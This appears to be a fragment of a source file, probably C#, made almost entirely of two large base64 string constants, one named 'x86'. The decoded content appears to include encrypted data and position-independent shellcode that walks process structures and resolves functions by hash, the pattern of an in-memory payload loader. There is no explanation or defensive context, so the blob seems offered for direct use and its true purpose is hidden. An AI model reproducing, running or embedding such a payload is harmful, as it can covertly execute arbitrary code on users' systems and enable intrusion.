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";
13 static string x86 = @"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